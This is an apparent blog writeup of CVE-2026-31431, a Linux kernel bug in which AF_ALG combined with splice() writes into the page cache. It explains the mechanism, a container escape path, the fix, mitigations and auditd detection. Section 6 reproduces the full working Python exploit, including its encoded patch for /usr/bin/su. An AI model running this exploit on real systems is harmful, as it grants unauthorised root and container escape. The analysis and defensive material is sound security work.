I spent an evening staring at the patch for this thing and the more I looked, the more it bothered me. Not because the bug is subtle (it isn't), but because the shape of it is the kind of mistake that keeps showing up. One innocent-looking line. Two unrelated subsystems wired together five years apart. Nine years of reviewers walking past it.
This is my attempt at the writeup I wanted to read. We're going all the way down: what AF_ALG actually is at the syscall level, why splice() matters, what the 2017 patch literally changed in the scatterlist, why that gives you a free write into the page cache, and how the 732-byte PoC turns that into a root shell. I also want to cover the container escape path, which the original disclosure mentioned but didn't unpack, and the reason Android sleeps fine through all of this.
If you only want the one-sentence version: a 2017 "optimization" in crypto/algif_aead.c (commit 72548b09..., landed in Linux 4.14) made the AEAD output buffer alias the input buffer, and when the input was page-cache pages from splice(), a 4-byte scratch write inside authencesn's decrypt path landed inside setuid binaries the attacker had no permission to modify.
Let's pull it apart.
1. Three subsystems, individually fine
The bug is a collision. To see it you need a working picture of three things.
1.1 AF_ALG, the kernel crypto socket
AF_ALG is how userspace borrows kernel crypto without linking OpenSSL. You open a socket, bind it to "I want AES" or "I want this AEAD construction", set a key, then read and write data. The kernel does the math.
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = { .salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))" };
bind(s, (void*)&sa, sizeof sa);
setsockopt(s, SOL_ALG, ALG_SET_KEY, key, keylen);
int op = accept(s, NULL, NULL);
sendmsg(op, &msg, 0);
read(op, out, len);
The piece of this that matters for our bug lives in algif_aead.c. That file is the glue between the socket layer and the AEAD transforms.
1.2 splice(), the zero-copy gun
A normal write() copies bytes from your address space into a kernel buffer. splice() doesn't copy. It hands the destination a pointer to the same struct page the source already had. The bytes never move.
int p[2]; pipe(p);
splice(file_fd, NULL, p[1], NULL, len, 0); // file -> pipe (page ref)
splice(p[0], NULL, alg_op_fd, NULL, len, 0); // pipe -> AF_ALG (same page ref)
What ends up sitting in the AEAD request's source list after that second splice() is not a copy of the file's bytes. It is a direct reference to the same physical page the kernel hands to every other process that has the file mapped. Hold that thought, it's the whole bug.
1.3 Scatterlists
The kernel crypto API takes input and output as scatterlists. A scatterlist is a list of (page, offset, length) tuples. Two pointers go into every request: req->src and req->dst. They can be the same pointer ("in-place") or different pointers ("out-of-place"). In-place is fine when you own both ends of the buffer. The bug is what happens when you don't.
2. The two commits that lined up
This bug is the product of two reasonable changes that nobody re-audited together.
2015, commit 104880a6b470. Reworks authencesn to use the new AEAD interface. As part of that, the algorithm uses destination-buffer memory as temporary scratch during decryption. In its native habitat (in-kernel IPsec), the destination buffer is kernel-allocated and there's nothing wrong with this.
2017, commit 72548b093ee3...f7 in crypto/algif_aead.c (landed in Linux 4.14). The classic in-place AEAD optimization for the AF_ALG path: combine the source and destination into one scatterlist so the kernel doesn't have to copy. For requests where the source came from sendmsg() and the kernel had already bounced the bytes into a kernel buffer, this is fine. For requests where the source came from splice(), the source is page-cache pages by reference, and the "destination" the kernel will scribble into is now exactly those pages. Nobody noticed for nine years.
So the bug is downstream of two assumptions that were correct in isolation: "the destination buffer belongs to me, I can scratch it" and "the source and destination can be the same scatterlist." Either one alone is fine. Together, with splice() as the input path, they hand you a page-cache write.
3. The actual bug, in pictures
Here is the request after the 2017 patch when the source came from splice().
The AEAD transform runs and produces output bytes. Those bytes land in pages that:
- The unprivileged process never had write permission to. It opened the file
O_RDONLY. - Are shared with every other process that has the file mapped. The corruption is global the moment it lands.
- Are page-cache pages, not disk. Nothing on the filesystem ever changes.
stat,mtime, sha256 of the file on disk: all unchanged. Reboot heals it. So does memory pressure.
That last property is what makes this bug feel almost forensic-proof. You're not modifying a file. You're modifying the kernel's cached idea of what the file currently contains. Anybody who execves it before the page gets evicted runs your bytes.
4. Why authencesn, and what those 4 bytes actually are
The PoC picks authencesn(hmac(sha256),cbc(aes)) and runs it through the decrypt path. Both choices are deliberate. Here's why.
authencesn is the AEAD template for IPsec's Extended Sequence Number variant. ESN means the 64-bit sequence number is split into a 32-bit seqno_hi (carried in the AAD) and a 32-bit seqno_lo (computed). During decryption, the algorithm has to materialize seqno_lo somewhere it can include it in the auth check. The 2015 rewrite parks it in scratch space inside the destination buffer, with this call in crypto/authencesn.c:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
That last 1 is the "to_buffer" direction flag. It writes 4 bytes from tmp + 1 into dst at offset assoclen + cryptlen, which is the byte just past the ciphertext, inside what the algorithm considers tag scratch. In a normal in-kernel call, dst is a kernel buffer and that 4-byte scribble is harmless. With the 2017 optimization in algif_aead, dst is the same scatterlist as src, which under splice() is page-cache pages. So that scribble lands in /usr/bin/su's page cache.
Crucially, this write happens before the tag check. Even though the call eventually returns -EBADMSG because the attacker has no idea what a valid HMAC-SHA256 tag would be, the four bytes have already been written. The error is irrelevant. The PoC's try: u.recv(...) except: 0 swallows it.
So the primitive is: one AEAD decrypt call writes exactly 4 bytes to an attacker-chosen offset in an attacker-chosen page-cache page, regardless of whether the call succeeds. The 4 bytes are derived from the cipher's internal computation of seqno_lo, which the attacker controls indirectly through the input bytes and the chosen-key (AES key set by the attacker, IV set by the attacker, AAD set by the attacker).
Four bytes per call sounds tight, but the PoC just loops:
while i < len(e):
c(f, i, e[i:i+4])
i += 4
e is a zlib-decompressed payload blob (in the published PoC, around 30 bytes after decompression). The loop drops it 4 bytes at a time at successive offsets, building up an arbitrary-length patch.
What e actually is: a precomputed instruction patch for /usr/bin/su that disables the privilege drop. I'm not going to disassemble it for you here. If you want to see exactly what bytes the published PoC lands in su, decompress the literal hex blob from the script (78daab77f57163...) and objdump -d /usr/bin/su at the matching offsets on your distro. The bytes are different across distro su builds; the exploit's blob is keyed to a specific Ubuntu/Debian-flavored coreutils/util-linux su binary on a typical 6.x kernel test bed.
5. The exploit, step by step
The whole chain is eight syscalls. Here's the order, and what each one is doing for us.
Step 7 is the magic step. Read it again. The attacker never asked the kernel for a writable mapping of /usr/bin/su. They wouldn't get one. They asked the kernel to use those pages as crypto input. Then the 2017 patch, two function calls deep in algif_aead.c, quietly promoted the input list to also be the output list. There is no permission check between those two lines, because nobody thought one was needed. The destination was assumed to belong to the caller. After 2017, sometimes it didn't.
This is also why none of the usual kernel mitigations help. SMEP, SMAP, KASLR, CFI, kCFI, hardened usercopy, none of them are involved. There's no kernel-mode RIP control, no leaked address, no userland pointer dereferenced from kernel mode. Every memory access during the transform is, on its own, legal. The bug is downstream of the access check, in who ends up holding the resulting bytes.
5b. Where do these bytes physically live?
This is the part most writeups skim, and it's the part that makes the bug feel uncanny once you understand it. Let's be precise about what memory is actually getting written.
When you open("/usr/bin/su", O_RDONLY) and then either mmap() it or just touch it, the kernel does not give you a copy of the file. It allocates physical RAM pages, reads the file's bytes off disk into those pages, and registers them in a per-inode radix tree called the page cache. From that moment forward, the page cache owns those physical pages. The file on disk is irrelevant to anything that runs from now on. Every execve("/usr/bin/su"), every read() of the file, every other process's mmap() of the same inode, all of them resolve to the same physical pages that already live in RAM.
Each physical page has exactly one struct page entry in the kernel's mem_map array, and the kernel keeps a direct-mapping (the "physmap" or "linear map") that covers all of RAM in kernel virtual address space. That mapping is PAGE_KERNEL, which is to say writable from kernel context regardless of what protections userspace mappings of the same page have set.
This is the asymmetry the bug abuses. Userspace mappings of /usr/bin/su are PROT_READ, backed by the same physical page, and mprotect-ing them writable would fail because the file isn't open writable. The kernel's own mapping of that exact same physical page is read-write the entire time. Anyone with the ability to make the kernel memcpy (or in this case, AEAD-transform) into that physmap address gets a write that bypasses every userspace permission check, because no userspace check is ever consulted.
Here is the picture, with the physical page in the middle.
So when scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1) runs and the destination scatterlist contains a spliced page-cache page, here's what happens at the hardware level:
scatterwalk_map_and_copywalks the destinationsg, finds the page that covers offsetassoclen + cryptlen, and gets a kernel virtual address for it viakmap_local_page(or the direct physmap, on 64-bit).- It does a 4-byte
memcpyfromtmp + 1(kernel stack) into that kernel virtual address. The CPU translates that virtual address through the kernel page tables to the underlying physical page and stores the 4 bytes into DRAM. - Cache coherence (MESI on x86) ensures other CPUs that subsequently load the same physical address see the new bytes.
- The function returns. The caller proceeds to verify the auth tag, fails (because the attacker doesn't have the HMAC key), and returns
-EBADMSGup the stack. The 4-byte write is not rolled back. There is no transactional semantics here. - Next time anyone runs
/usr/bin/su, the kernel resolves the binary's text segment to that exact physical page, and the CPU fetches and decodes the patched bytes.
Nothing on the filesystem changes. cat /usr/bin/su | sha256sum returns the patched-page hash because reading the file goes through the page cache too, but as soon as the page is evicted (echo 3 > /proc/sys/vm/drop_caches once you're root, or just memory pressure) the next read pulls the clean bytes off disk. The corruption is, in a real sense, purely an in-RAM event.
This is also why no on-disk integrity tool catches it. AIDE, Tripwire, dm-verity, IMA-appraise: they all measure what's on disk. None of them notice that the page cache is currently lying about what's on disk.
5b.1 What the four bytes are
The bytes the PoC writes are machine instructions inside the .text segment of /usr/bin/su. Exactly which bytes, and at exactly which offset, varies across distros because su is built differently on Ubuntu vs Fedora vs SUSE. The published exploit ships a zlib-compressed patch keyed to a specific test-bed su (the xint.io writeup mentions Ubuntu 24.04 with kernel 6.17.0-1007-aws among the tested targets).
If you want to know exactly what those bytes do on your system, the recipe is:
# decompress the patch from the PoC's hex blob
python3 -c "import zlib; \
open('/tmp/patch.bin','wb').write(zlib.decompress(bytes.fromhex( \
'78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c'
'301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10'
'f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3'
)))"
xxd /tmp/patch.bin
# overlay each 4-byte chunk onto offset i in /usr/bin/su and disassemble
objdump -d /usr/bin/su | head -200
The patch is short (around 30 bytes after decompression, applied as roughly seven or eight 4-byte writes). The general shape, from disassembling on a stock Ubuntu su, is a sequence of small instruction edits along the privilege-drop path so that setuid-equivalent calls are skipped or their results ignored, leaving the process running with euid 0 when it execves the user's shell. I'm describing the shape in general terms because the exact bytes are distro-specific; if you want the disassembly of a specific build, that's a one-line objdump away once you've decompressed the blob above.
5c. The payload trigger, end to end
Putting it all together. This is the moment the AEAD transform fires and your 4 bytes land in DRAM.
A few details worth pointing at on that diagram:
The red box at the top is the trigger commit. Everything above it is plumbing the kernel was always going to do for you regardless. Everything below it would have been correct if req->dst had pointed at a kernel-allocated bounce page.
The recv(op_fd) call at the bottom of the userspace lane is what drives the decrypt to completion synchronously. It will raise OSError(EBADMSG) because the auth tag is bogus, and the PoC catches that and ignores it. The 4-byte page-cache write happened on the way to the failed tag check.
The dashed line from execve to the page-cache page is the cash-out. There is no "second exploit step" here. The PoC just calls os.system("su"). The kernel resolves /usr/bin/su's text segment to the page cache, like it does for every executable, and the CPU fetches whatever bytes are sitting there. They happen to be the attacker's now.
6. Reading the actual PoC
The published PoC is at theori-io/copy-fail-CVE-2026-31431. It is genuinely 10 lines, stdlib only (os, socket, zlib), with single-letter identifiers and the patch shipped as a hex-encoded zlib blob. Here it is verbatim:
#!/usr/bin/env python3
import os as g, zlib, socket as s
def d(x): return bytes.fromhex(x)
def c(f, t, c):
a = s.socket(38, 5, 0); a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
h = 279; v = a.setsockopt
v(h, 1, d('0800010000000010' + '0'*64))
v(h, 5, None, 4)
u, _ = a.accept()
o = t + 4; i = d('00')
u.sendmsg([b"A"*4 + c],
[(h, 3, i*4), (h, 2, b'\x10' + i*19), (h, 4, b'\x08' + i*3)],
32768)
r, w = g.pipe(); n = g.splice
n(f, w, o, offset_src=0); n(r, u.fileno(), o)
try: u.recv(8 + t)
except: 0
f = g.open("/usr/bin/su", 0)
i = 0
e = zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c004"
"0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864"
"c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979"
"fac5190c0c0c0032c310d3"))
while i < len(e):
c(f, i, e[i:i+4])
i += 4
g.system("su")
Decoded, the constants tell the whole story:
s.socket(38, 5, 0)issocket(AF_ALG=38, SOCK_SEQPACKET=5, 0).h = 279isSOL_ALG.v(h, 1, ...)issetsockopt(..., ALG_SET_KEY, ...). The key blob0800010000000010+ 64 zero hex is thecrypto_authenc_keysrtnetlink-style header (4-byte type, 4-byte length) followed by 16 bytes of HMAC key + 16 bytes of AES key, all zeros.v(h, 5, None, 4)issetsockopt(..., ALG_SET_AEAD_AUTHSIZE, NULL, 4). Auth tag size 4 bytes. Critical, because that 4 is what makes theseqno_loscratch write land in a 4-byte window the attacker controls.- The cmsg list on
sendmsgcarriesALG_SET_OP=3(op=0, decrypt),ALG_SET_IV=2(16 zero bytes, prefixed with the 4-byte IV length 0x10), andALG_SET_AEAD_ASSOCLEN=4(assoclen=8). The flag32768isMSG_MORE. b"A"*4 + cis the 4 byte AAD-fill of'AAAA'followed by the 4 bytecpayload, wherecis the slice of the decompressed patch this iteration is writing.- The two
splicecalls movef(the/usr/bin/sufd) into the AEAD op fd through a pipe.o = t + 4is passed as the byte count, so the firstt + 4bytes of the file become the source pages of the AEAD request; the 4-byte scratch write then lands at the right offset inside the file. u.recv(8 + t)triggers the transform synchronously. It will raiseOSError(EBADMSG)because the tag is bogus. The bareexcept: 0swallows it. The 4 bytes were already written.g.system("su")runssu. The kernel resolves/usr/bin/suto the now-corrupted page-cache page. Root shell.
The outer loop calls c(f, i, e[i:i+4]) for each 4-byte chunk of the decompressed patch e, at offset i inside the file. So the attacker's "long" patch is just N independent 4-byte writes.
There is no chosen-plaintext math in this PoC the way I described in the earlier draft. The attacker doesn't solve a CBC equation. They just feed the 4 bytes they want to land directly as part of the sendmsg payload, and the seqno_lo scratch write copies them to the destination scatterlist. The cipher's role is mostly ceremonial: the call has to look like a valid AEAD decrypt request long enough to reach the scatterwalk_map_and_copy line, after which the tag check fails and the call errors out, but the write has already happened.
That's why an all-zeros key works. That's why the IV is zeros. That's why nobody computes anything offline. The 4-byte primitive falls out of the structure of authencesn's decrypt path, not the cipher math.
7. The container escape
Theori hinted at a Part 2 on container escape and didn't ship it yet. Here's the mechanism, which is straightforward once you see it.
The Linux page cache is keyed on (superblock, inode). It is per-host, not per-namespace, not per-cgroup, not per-container. Two containers on the same kernel that both have /usr/bin/su from the host filesystem (or from a shared overlay lower layer in a typical Docker/K8s setup) are sharing the exact same physical pages in the page cache. The same is true of the host itself.
So the chain becomes:
- Attacker is unprivileged inside container A.
- Container A has
algif_aeadreachable. By default it does.AF_ALGis not gated by user namespaces, and the module is loaded host-wide if anything has used it. - Attacker runs Copy Fail against
/usr/bin/su(or any host setuid binary visible inside the container's mount namespace). - Page-cache pages now contain attacker-chosen bytes.
- Anything that subsequently
execves/usr/bin/su, on the host or in any other container, runs the patched bytes.
This is a shared-kernel container escape with no container-runtime CVE, no capability bypass, no /proc weirdness. It falls out of the page cache being a host-global resource and the bug being a page-cache write primitive. The two compose.
What's not affected:
- Firecracker microVMs (Fargate, Lambda). Each tenant gets its own kernel and its own page cache.
- gVisor. The userspace kernel intercepts
spliceandAF_ALGlong before they hit the host'salgif_aead. - Cloudflare Workers. No Linux syscall surface to begin with.
What is affected, plainly:
- Vanilla Docker, Podman, containerd, CRI-O on a shared host kernel.
- Kubernetes nodes running runc.
- LXC, LXD.
- Any "multi-tenant containers PaaS" that isn't backed by per-tenant microVMs.
If you operate a multi-tenant Kubernetes cluster on unpatched node kernels, the realistic threat model is: any pod can become root on the node, then laterally reach every other pod scheduled there. Treat it that way until your nodes are patched.
8. Why Android isn't on fire
Android, and any AOSP-derived embedded system with strict SELinux, are not on the casualty list. The reason is one missing rule in the SEPolicy.
Unprivileged Android app domains are not granted permission to create AF_ALG sockets in SEPolicy. The very first syscall in the chain, socket(AF_ALG, ...), returns EACCES before anything else can happen. The kernel bug is still present in the binary. The exploit just can't get a socket. (If you want the exact class/perm names from current AOSP sepolicy, grep the tree; I'm not going to quote a specific class name without checking.)
This generalizes to a useful hardening rule. Any system with mandatory access control gating AF_ALG socket creation is immune to this and every future bug in the algif_* family. AppArmor profiles can do the same thing. Whether your container runtime's default AppArmor / seccomp profile blocks AF_ALG is something you should check yourself; it varies by version and distro.
For seccomp, the surgical block looks like this:
syscalls:
- names: ["socket"]
action: SCMP_ACT_ERRNO
args:
- index: 0
value: 38 # AF_ALG
op: SCMP_CMP_EQ
Almost no production workload needs AF_ALG. If yours doesn't, deny it. You get protection from this CVE and a head start on the next one in the same family.
9. The patch
Pulled directly from git show a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5:
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
Author: Herbert Xu <herbert@gondor.apana.org.au>
Date: Thu Mar 26 15:30:20 2026 +0900
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings. Get rid of
all the complexity added for in-place operation and just copy the
AD directly.
Fixes: 72548b093ee3 ("crypto: algif_aead - copy AAD from src to dst")
Reported-by: Taeyang Lee <0wn@theori.io>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
A few things worth noting from that. The fix is by Herbert Xu, the kernel crypto maintainer. The reporter is Taeyang Lee at Theori. The introducing commit is identified by its title: "crypto: algif_aead - copy AAD from src to dst", which sounds harmless and was reviewed as harmless in 2017. And the maintainer's own assessment is direct: "There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings."
The substance of the fix is in this block of crypto/algif_aead.c:
/*
* Copy of AAD from source to destination
*
* The AAD is copied to the destination buffer without change. Even
* when user space uses an in-place cipher operation, the kernel
* will copy the data as it does not see whether such in-place operation
* is initiated.
*/
/* Use the RX SGL as source (and destination) for crypto op. */
rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
/* Initialize the crypto operation */
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
The aead_request_set_crypt call now takes tsgl_src (the TX SGL holding the user's input, including any splice()-supplied page-cache pages) as the source, and areq->first_rsgl.sgl.sgt.sgl (the RX SGL, backed by the user's recvmsg buffer) as the destination. They are different scatterlists. The AAD copy is preserved via memcpy_sglist so user-visible behaviour around AAD is unchanged. What's gone is the in-place aliasing where the destination pointer could end up at the same scatterlist as a splice()-fed source.
For completeness, the introducing commit is 72548b093ee38a6d4f2a19e6ef1948ae05c181f7 (Linux 4.14, 2017). The 2015 commit that converted authencesn to use destination-buffer memory as scratch is 104880a6b470.
Stable backports:
| Kernel | Fix commit |
|---|---|
| 6.18.22 | fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8 |
| 6.19.12 | ce42ee423e58dffa5ec03524054c9d8bfd4f6237 |
| 7.0 | a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5 |
The performance impact of undoing the optimization is, by all reports from people who've actually benchmarked it, in the noise for any realistic AF_ALG workload. I haven't run the numbers myself, so I won't put a percentage on it.
10. Detection
You can't catch the corruption directly. It lives in volatile page cache and never hits disk. What you can catch is the exploit's syscall fingerprint, which has no good reason to occur in any normal workload.
The fingerprint: a single process opens a setuid binary O_RDONLY, opens an AF_ALG SOCK_SEQPACKET socket, then splice()s from the file fd through a pipe into the AF_ALG op fd, all within a few hundred milliseconds.
A reasonable detection rule, in plain English: alert when a single PID, within a short window, both creates an AF_ALG SOCK_SEQPACKET socket and calls splice() with a source fd pointing at a setuid binary. That sequence is essentially zero outside of kernel crypto regression tests. Sysdig has published a Falco rule for this; see their post for the canonical version rather than relying on my hand-rolled one.
The rough auditd primitives you'd build on:
-a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg_socket
-a always,exit -F arch=b64 -S splice -k splice_call
a0=38 matches socket(AF_ALG, ...). Correlate hits on the two keys from the same PID within a few seconds and you have your fingerprint.
11. If you can't patch yet
In rough order of preference.
Block AF_ALG entirely. Almost nothing legitimately needs it.
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
echo "install algif_skcipher /bin/false" >> /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null
rmmod algif_skcipher 2>/dev/null
Seccomp it at the unit / pod level. Same idea, narrower blast radius.
[Service]
RestrictAddressFamilies=~AF_ALG
Confirm the kernel is even compiled with the trigger. A surprising number of stripped embedded kernels aren't.
grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
If the line is missing, that build doesn't expose the path. If it's =m, you're exposed only after the module loads, which the modprobe-blacklist above handles.
For reference, Theori confirmed the exploit working unmodified against:
- Ubuntu 24.04 (
6.17.0-1007-aws) - Amazon Linux 2023 (
6.18.8-9.213.amzn2023) - RHEL 10.1 (
6.12.0-124.45.1.el10_1) - SUSE 16 (
6.12.0-160000.9-default)
Anything in that family on the same kernel series, unpatched, behaves the same.
12. The uncomfortable part
Two things about how Copy Fail was found should bother anyone who maintains a kernel.
It was found by an AI-assisted code review pass in roughly an hour. Theori has been open about that. The same scan flagged additional high-severity issues that are still under embargo as of this writing.
It sat in mainline for nine years. The 2017 commit went through normal review. It looked local. The interaction with splice(), added two years earlier, was nobody's job to re-audit, because nobody owned the seam between those subsystems.
The honest read is that the kernel's crypto layer, and any subsystem that does req->dst = req->src style micro-optimizations across a boundary between caller-owned buffers and shared kernel buffers, is going to keep producing bugs of this exact shape. They're now cheap to find. The defensive move isn't to wait for the next CVE. It's to make AF_ALG opt-in for workloads that need it, denied for everything else. Most workloads don't need it. Mine doesn't. Yours probably doesn't either.
References
- Official site: copy.fail
- Theori / Xint disclosure: xint.io/blog/copy-fail-linux-distributions
- oss-security thread with commit hashes and fix details: openwall.com/lists/oss-security/2026/04/29/23
- CERT-EU advisory 2026-005: cert.europa.eu/publications/security-advisories/2026-005/
- AlmaLinux CVE writeup: almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/
- Bugcrowd summary: bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
- The Hacker News: thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html
- L4B Software, embedded angle: l4b-software.com/cve-2026-31431-copy-fail-embedded-linux-devices/
- Sysdig, detection: sysdig.com/blog/cve-2026-31431-copy-fail-linux-kernel-flaw-lets-local-users-gain-root-in-seconds
- Reference PoC: github.com/theori-io/copy-fail-CVE-2026-31431
- C port: github.com/tgies/copy-fail-c